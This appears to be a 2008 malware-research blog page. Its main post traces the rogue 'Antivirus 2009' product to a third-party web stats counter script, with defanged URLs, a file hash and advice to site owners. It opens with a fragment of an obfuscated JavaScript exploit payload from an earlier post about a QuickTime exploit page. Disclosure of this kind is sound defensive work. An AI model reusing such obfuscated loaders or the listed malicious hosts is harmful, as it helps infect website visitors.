y5="f2";y4="f1";y3=y4+'("_0xTPKAO_08t9UAO_GjzhK8tFGaQhkqscUnyJ38TfUx
OcGjzhK8tF6vs3U7jN02oX57u3I7oK97OYhP3fUjtfUjuX2neSDCyT3IsXPIsXsEyhPx
Bh3Czhsx3YBaOsP2or5C7XUbvPMsvu2IoIlCvQIP8sIIyNhPsjU78jU7OYBPsPhsjT1s
8YBaOc08t9UAO_lc342FOvW1O42ATNbxtIG8tP3c3YOAO_zCtU9FOvW1OpVIvK5
boN6sJfS8T9S8tIlqz99jJmVAeU5nTYBEbvNjJ@5welIcJSsEyYXEbHIAeN_8TSsidSMj
tgXEbHIAeNhnzmD8OYMoT5kvWlMoT5kvWlMoTlN8tYPoTmhvpYPoTHNiJ5MoTk
kEJ5MoTkkaQDlwX9PjtwlqtmhEyw_8TSuqy@GiQYXoJVPcXYlAt9DwX9PjtwlCWlMv
dV9AtSV8dV9AtR98dV1EJZN8dVUAthMAyw_8TSuqyRPAtSMFphMAtYXoJVPcXYhv
JRPoT5NAphMoThlEtmMoT5NAphMoTHM8tZlwX9PjtwlqtlhEyw_8TSuqyRPAJSMFph
MAtSMFJ5kiQSMFpD0ipYXoJVPcXY_vJDMoTl4aQmlwX9PjtwlqtD_Eyw_8TSuqyRPAt
SMjJ99EpSMFJ5MAJSMfpZ0ipSMFpV_vQSMnQZM8QYXoJVPcXYN8QRDwX9PjtwlqtS
98dVI8JHNvdVD8WSSvdVV8Jk4vdVIaQVN8dV5ip@GAyw_8TSuqyR5atYXoJVPcXYN
Continue reading ‘QuickTime exploit page installs msupd_0809_upd070148.exe (VIDEO)’

04 Sep

Antivirus 2009…brought to you by Motigo

A colleague called me today stating that his website was the victim of a hack and he did not know what to do. He was frantic and said that his website was distributing Antivirus 2009, so I decided to take a look at it and lo and behold, we found Antivirus 2009 being distributed from Motigo’s ad system.

For those who don’t know what Antivirus 2009 is, it’s a rogue (fake) security product. You can see a video of it in action here.

*Update* We have noticed our keyword search hit for “quickupdates” has increased 70% of our total keyword hit statistics over the past 24 hours. If you are viewing our site as a result of experiencing this pop-up, please leave us a comment and be sure to include what site you were on at the time.

We traced the AV09 pop-up to the following JavaScript counter code.

The ID has been removed to protect the victim’s identity.

<!-- Begin Motigo Webstats counter code -->
<a id="*" href="hxxp://webstats.motigo.com/"><img src="hxxp://m1.webstats.motigo.com/n.gif?id=*" border="0" alt="Free counter and web stats" width="18" height="18" /></a>
<script src="hxxp://m1.webstats.motigo.com/c.js?id=*" type="text/javascript"></script>
<!-- End Motigo Webstats counter code -->

Resulted in this pop-up being displayed on his site:

[Screenshot: Antivirus 2009 via Motigo]

Clicking the pop-up brought us to:

hxxp://quickupdates29.com <-- don’t go here

[Screenshot: Antivirus 2009 via Motigo]

File distributed:

File: AV2009Install_*.exe (0570484B66E9A139D8FD0A71F5448957)
MDB: /lithium-malware/AV2009Install.zip

The Motigo webstats counter code is responsible for several pop-ups, one of which is Antivirus 2009. This is a scary thought: everyone hosting this code on their website can potentially infect their viewers/customers, because a third-party script tag runs with the full privileges of the page that embeds it. This is an extremely cost-effective distribution method for the malware creators, and I bet we will see more like it as time goes by.

Important note to website owners!

If you are going to use any service (free or paid), make sure you understand all of its terms and conditions. It’s not unusual for free services to come with ads or pop-ups, but you must ask yourself the following questions before putting anything on your site.

1. What is the service provider’s privacy policy?

2. What are their terms of service?

3. How do they screen their affiliate links for malware/phishing attacks?

Finally, it’s important to see what their users think of the service. Motigo, for one, has a laundry list of pop-up complaints.

Related News: PandaLabs reports on the sudden increase of rogue (fake) security products. -> Report

Removal:

Remove this threat with MalwareBytes!



